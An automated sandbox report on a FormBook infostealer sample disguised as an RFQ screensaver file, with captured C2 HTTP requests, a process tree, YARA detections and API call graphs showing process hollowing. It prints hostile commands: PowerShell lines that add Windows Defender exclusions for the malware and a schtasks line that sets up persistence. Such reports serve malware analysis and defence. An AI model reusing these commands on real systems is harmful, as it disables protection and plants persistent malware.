                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:48.237741947 CET    1749    OUT
                                                                                                            Dec 12, 2024 10:23:49.334330082 CET    968    IN    HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:49 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gG60QB2uE%2BTi7h7ygzN2wL0kEKf80yQ2CHDyamVOVtC0m7SKsJzqznpr9MXugXfny%2FuKle6Q0yboNKAFIfb1NCUoHM0wuCU2VAiSpMlAd%2BfV%2BE4ZMN8QNjPZ07ha8Ym"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca867883a5e80-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2055&rtt_var=1027&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4221&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                            49    192.168.2.22    49214    172.67.145.234    80
                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                            Dec 12, 2024 10:23:50.767215014 CET    538    OUT    GET /ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:51.985297918 CET    1236    IN    HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:23:51 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZ5J7MLtGi6nVmwyiMeJvh6yBddV2nShL4yljVGYh9FTAStbNL4YKeTdwO66%2FN2EzvovszjHDDLlYdIAfKECZsUyxklYrAE5oSBjmfDPGhbsfhryAuhZTFt3pglVxSEm"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca8781d168c72-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error pa
                                                                                                            Dec 12, 2024 10:23:51.985342026 CET    82    IN
                                                                                                            Data Ascii: ge -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                            Target ID:0
                                                                                                            Start time:04:19:38
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\Desktop\RFQ_P.O.1212024.scr
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\RFQ_P.O.1212024.scr" /S
                                                                                                            Imagebase:0x13d0000
                                                                                                            File size:878'088 bytes
                                                                                                            MD5 hash:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:04:19:44
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_P.O.1212024.scr"
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:04:19:45
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0xd10000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:04:19:45
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp61C0.tmp"
                                                                                                            Imagebase:0x700000
                                                                                                            File size:179'712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:04:19:46
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x11b0000
                                                                                                            File size:45'248 bytes
                                                                                                            MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.396612978.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.396870614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.398641756.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:04:19:46
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\System32\taskeng.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:taskeng.exe {5B36C18D-91BD-4673-848D-E2536B74881F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                            Imagebase:0xff6a0000
                                                                                                            File size:464'384 bytes
                                                                                                            MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:04:19:48
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\PEJmengI.exe
                                                                                                            Imagebase:0x1150000
                                                                                                            File size:878'088 bytes
                                                                                                            MD5 hash:BC03B7D0CC3FAA356F5C49609D150B44
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:04:19:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe"
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.873782625.0000000003E40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:12
                                                                                                            Start time:04:19:55
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                                            Imagebase:0xc0000
                                                                                                            File size:303'104 bytes
                                                                                                            MD5 hash:5F2122888583347C9B81724CF169EFC6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873456007.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873508536.0000000000360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.873699119.0000000001D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Target ID:13
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:15
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PEJmengI.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:04:19:58
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PEJmengI" /XML "C:\Users\user\AppData\Local\Temp\tmp958C.tmp"
                                                                                                            Imagebase:0xc30000
                                                                                                            File size:179'712 bytes
                                                                                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:19
                                                                                                            Start time:04:20:02
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x11b0000
                                                                                                            File size:45'248 bytes
                                                                                                            MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:20
                                                                                                            Start time:04:20:07
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe"
                                                                                                            Imagebase:0xce0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.873703699.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:23
                                                                                                            Start time:04:20:25
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x13a0000
                                                                                                            File size:517'064 bytes
                                                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.461322824.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:true


                                                                                                              Execution Graph

                                                                                                              Execution Coverage:20.7%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:10.5%
                                                                                                              Total number of Nodes:76
                                                                                                              Total number of Limit Nodes:2

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: e0e58ddb2fd209d49b78f0ae25c8be0711af1e700d6034f7f63a3829613a3f0f
                                                                                                              • Instruction ID: 4bc551cd53b4b1e6526afead3f4f4f415325ef1a0b1300bd51445c8463c78172
                                                                                                              • Opcode Fuzzy Hash: e0e58ddb2fd209d49b78f0ae25c8be0711af1e700d6034f7f63a3829613a3f0f
                                                                                                              • Instruction Fuzzy Hash: 04F16F70915249DFCB08CFA9C8809EEFBB2FF9A300B258599D4119B265C734E986CF95

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: 0181359e7df92822d2d83ea1d1bd7f2a3bdcc83243db091712d97dfd38ba26e4
                                                                                                              • Instruction ID: f17610e59ecebdc3c7c6603fcb1ecaf5c1bbb48475b54c8a20d1d91c62d6ef3c
                                                                                                              • Opcode Fuzzy Hash: 0181359e7df92822d2d83ea1d1bd7f2a3bdcc83243db091712d97dfd38ba26e4
                                                                                                              • Instruction Fuzzy Hash: AEC13C70D0521ADFCB08DFA6C8849EEFBB2FF89300B25C559D416A7254D734AA82CF95

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TuA$UC;"
                                                                                                              • API String ID: 0-2071649361
                                                                                                              • Opcode ID: 5900a5f3daaf08c0150abf20aba0d345e7ea93700b9aae87f6eab46b65c6fe53
                                                                                                              • Instruction ID: 994fcd4e0af841305aa6390dc11b6759c277a0c3199a7fbeb57008887921cb17
                                                                                                              • Opcode Fuzzy Hash: 5900a5f3daaf08c0150abf20aba0d345e7ea93700b9aae87f6eab46b65c6fe53
                                                                                                              • Instruction Fuzzy Hash: 93A1F775D05609DFCB08CFA6D9805EEFFB2EF89310F24952AE419AB264D7309942DF90
                                                                                                              Strings
                                                                                                              Memory Dump Source

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 191 656918-6569b1 193 6569b3-6569ca 191->193 194 6569fa-656a22 191->194 193->194 197 6569cc-6569d1 193->197 198 656a24-656a38 194->198 199 656a68-656abe 194->199 200 6569f4-6569f7 197->200 201 6569d3-6569dd 197->201 198->199 206 656a3a-656a3f 198->206 208 656b04-656bfb CreateProcessA 199->208 209 656ac0-656ad4 199->209 200->194 203 6569e1-6569f0 201->203 204 6569df 201->204 203->203 207 6569f2 203->207 204->203 210 656a41-656a4b 206->210 211 656a62-656a65 206->211 207->200 227 656c04-656ce9 208->227 228 656bfd-656c03 208->228 209->208 217 656ad6-656adb 209->217 212 656a4d 210->212 213 656a4f-656a5e 210->213 211->199 212->213 213->213 216 656a60 213->216 216->211 219 656add-656ae7 217->219 220 656afe-656b01 217->220 221 656ae9 219->221 222 656aeb-656afa 219->222 220->208 221->222 222->222 223 656afc 222->223 223->220 240 656cf9-656cfd 227->240 241 656ceb-656cef 227->241 228->227 243 656d0d-656d11 240->243 244 656cff-656d03 240->244 241->240 242 656cf1 241->242 242->240 246 656d21-656d25 243->246 247 656d13-656d17 243->247 244->243 245 656d05 244->245 245->243 248 656d27-656d50 246->248 249 656d5b-656d66 246->249 247->246 250 656d19 247->250 248->249 254 656d67 249->254 250->246 254->254
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00656BDF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              Control-flow Graph (656580-6566c4, WriteProcessMemory)
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0

                                                                                                              Control-flow Graph (656578-6566c4, WriteProcessMemory)
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656653
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0

                                                                                                              Control-flow Graph (6566d9-656803, ReadProcessMemory)
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0

                                                                                                              Control-flow Graph (6566e0-656803, ReadProcessMemory)
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00656792
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0

                                                                                                              Control-flow Graph (656450-65656b, VirtualAllocEx)
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00656502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0

                                                                                                              Control-flow Graph (656458-65656b, VirtualAllocEx)
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00656502
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0

                                                                                                              Control-flow Graph (1badfa-1baf02, VirtualProtect)
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001BAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0

                                                                                                              Control-flow Graph (656321-656442, Wow64SetThreadContext)
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 006563D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0

                                                                                                              Control-flow Graph (656328-656442, Wow64SetThreadContext)
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 006563D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0

                                                                                                              Control-flow Graph (1bae00-1baf02, VirtualProtect)
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001BAEA7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0

                                                                                                              Control-flow Graph (656238-656317, ResumeThread)
                                                                                                              APIs
                                                                                                              • ResumeThread.KERNELBASE(?), ref: 006562B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.371016593.0000000000650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00650000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_650000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9abb3df871e0ab49cce2159cb2e4936d9e3ea9d7dd9223b55ce1dfc19759a43
                                                                                                              • Instruction ID: 61608bf2fed3cc96e5bad242b35b4028b7b819a8694f2a5d56142be8aeaaa413
                                                                                                              • Opcode Fuzzy Hash: f9abb3df871e0ab49cce2159cb2e4936d9e3ea9d7dd9223b55ce1dfc19759a43
                                                                                                              • Instruction Fuzzy Hash: B0B10871D05249DFDB18CFA6D9806DEFBB2FF89300F21946AD015AB264EB349A46CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.369374718.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1b0000_RFQ_P.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4eb293013a3ce775696919bb0ee1be3e6c682f22c709ecea184cc66ebbe9e1b7
                                                                                                              • Instruction ID: ec82eabce996483f095572a5835da9c44829794c4588ec9d9202317e0fdaddf7
                                                                                                              • Opcode Fuzzy Hash: 4eb293013a3ce775696919bb0ee1be3e6c682f22c709ecea184cc66ebbe9e1b7
                                                                                                              • Instruction Fuzzy Hash: 9891C374A1521ACFCB08CF99C5849AEFBF1FF89310F25956AD415BB260D334AA41CF51
                                                                                                              Memory Dump Source
